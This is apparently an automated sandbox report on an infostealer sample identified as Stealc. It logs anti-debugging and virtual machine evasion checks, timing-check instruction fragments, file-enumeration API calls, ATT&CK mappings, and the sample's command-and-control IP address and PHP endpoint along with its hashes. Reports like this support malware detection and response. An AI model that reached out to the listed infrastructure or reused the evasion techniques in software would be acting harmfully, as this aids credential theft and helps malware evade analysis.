                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B5C second address: 8B4B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F57D451A1C9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B7A second address: 8B4B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134E2h 0x00000009 popad 0x0000000a jbe 00007F57D4F134DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43E5 second address: 8B43EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43EB second address: 8B43F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4540 second address: 8B4551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F57D451A1BCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4551 second address: 8B4557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4557 second address: 8B455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6BD0 second address: 8B6BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F57D4F134D6h 0x0000000a popad 0x0000000b jp 00007F57D4F134E4h 0x00000011 jmp 00007F57D4F134DCh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6BEF second address: 8B6C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C00 second address: 8B6C3D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F57D4F134D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F57D4F134E2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jc 00007F57D4F134D6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ecx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F57D4F134DEh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C3D second address: 8B6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C42 second address: 8B6C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD87F second address: 8BD889 instructions: 0x00000000 rdtsc 0x00000002 je 00007F57D451A1C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD889 second address: 8BD88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC1E7 second address: 8BC202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC392 second address: 8BC396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94135D second address: 941363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941A66 second address: 941A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941A6C second address: 941A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941A71 second address: 941A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94378F second address: 943793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94756C second address: 94758C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F57D451A1B6h 0x00000011 jnl 00007F57D451A1B6h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947AAE second address: 947AF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 je 00007F57D4F134EAh 0x0000000f jmp 00007F57D4F134E4h 0x00000014 pop ecx 0x00000015 nop 0x00000016 push dword ptr [ebp+122D29EDh] 0x0000001c mov edx, dword ptr [ebp+122D19F6h] 0x00000022 push 2C5B36C4h 0x00000027 push eax 0x00000028 push edx 0x00000029 je 00007F57D4F134DCh 0x0000002f js 00007F57D4F134D6h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AE88 second address: 94AE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AE92 second address: 94AE9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AE9C second address: 94AEC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jbe 00007F57D451A1B6h 0x0000000d jmp 00007F57D451A1BCh 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F57D451A1B6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AEC4 second address: 94AEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AEC8 second address: 94AECE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AECE second address: 94AED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AED4 second address: 94AED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40312 second address: 4D40316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40316 second address: 4D4031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4031C second address: 4D40358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 9C86h 0x00000007 mov esi, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F57D4F134E9h 0x00000012 mov ebp, esp 0x00000014 jmp 00007F57D4F134DEh 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40358 second address: 4D40371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F57D451A1C3h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6C1B93 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6C1ACE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8EE913 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089171F rdtsc | 0_2_0089171F
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_004738B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00474910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0046DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0046E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00474570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0046ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0046BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0046DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004616D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046F68A FindFirstFileA | 0_2_0046F68A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00473EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00473EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0046F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00461160 GetSystemInfo,ExitProcess | 0_2_00461160
                Source: file.exe, file.exe, 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwaree?c
                Source: file.exe, 00000000.00000002.2094357724.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2094357724.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW*
                Source: file.exe, 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13753
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13734
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13731
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13745
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13785
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089171F rdtsc | 0_2_0089171F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004645C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_004645C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00479860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479750 mov eax, dword ptr fs:[00000030h] | 0_2_00479750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00477850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00477850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00479600
                Source: file.exe, 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: iProgram Manager
                Source: file.exe | Binary or memory string: iProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00477B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00476920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00477850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00477850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00477A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00477A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.460000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.460000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 651 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37a | file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1525191
                Start date and time: 2024-10-03 20:45:07 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 3m 1s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 2
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 86
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe
                    No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                 | file.exe | malicious | Stealc | 185.215.113.37
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                 | Setup.exe | malicious | RedLine | 185.215.113.22
                 | file.exe | malicious | Stealc | 185.215.113.37
                 | file.exe | malicious | Stealc | 185.215.113.37
                 | file.exe | malicious | Stealc | 185.215.113.37
                 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                 | file.exe | malicious | Stealc | 185.215.113.37
                No context
                    No context
                    No created / dropped files found
                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit): 7.947623190255442
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name: file.exe
                File size: 1'802'752 bytes
                MD5: edecdb123ba6a0d389ff9b2993754c49
                SHA1: d27897486ab7cd802f52731b1e98b9b463854fc0
                SHA256: c1af8de0dbb010738eacb3fa66d5c3f1ea70ce1c480ac116ccd6bbfec781b1d1
                SHA512: aaea8500388d2a488108af455a9a6223fe17114132383604dcf9eeebe41f2366ec705880946fcf6103cba10970a7ca0944d9b55ec031f1206d306a434d08715c
                SSDEEP: 24576:iylaOkFij3aXFCxSc792uD21ihKMI3xnjcDSX7Qyqrfy3vIfOb9hlbS53gQ:iylkFXcZ/DEihKMI3VjiSLYbFq90QQ
                TLSH: 9185337A3FD69322C0EF7AB52FA6668A22B2CE3156F8589F1C04547C15471D8FB2B4C0
                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash: 00928e8e8686b000
                Entrypoint: 0xa87000
                Entrypoint Section: .taggant
                Digitally signed: false
                Imagebase: 0x400000
                Subsystem: windows gui
                Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major: 5
                OS Version Minor: 1
                File Version Major: 5
                File Version Minor: 1
                Subsystem Version Major: 5
                Subsystem Version Minor: 1
                Import Hash: 2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F57D4D990FAh
                    punpcklbw mm3, qword ptr [ebx]
